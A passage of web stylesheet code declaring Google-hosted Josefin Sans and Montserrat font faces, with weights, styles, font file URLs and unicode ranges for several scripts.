U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, 